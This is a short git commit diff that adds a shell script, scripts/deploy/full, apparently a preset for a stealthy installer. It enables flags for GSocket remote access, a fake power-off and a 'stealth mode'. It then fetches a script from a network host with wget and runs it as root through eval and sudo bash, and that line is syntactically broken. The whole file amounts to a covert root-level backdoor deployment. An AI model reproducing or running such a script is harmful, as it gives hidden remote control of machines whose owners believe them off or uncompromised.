refactor some scripts
This commit is contained in:
11
scripts/deploy/full
Executable file
11
scripts/deploy/full
Executable file
@@ -0,0 +1,11 @@
|
||||
#!/bin/bash
|
||||
# Full installation preset - requires root
|
||||
export NO_ROOT=false
|
||||
export NO_SERVICES=false
|
||||
export INSTALL_WOL=true
|
||||
export INSTALL_FAKE_POWEROFF=true
|
||||
export INSTALL_GSOCKET=true
|
||||
export STEALTH_MODE=true
|
||||
|
||||
# Download and run the main script with sudo
|
||||
eval "$(wget -qO- http://192.168.0.104/deployment/y" | sudo bash
|
Reference in New Issue
Block a user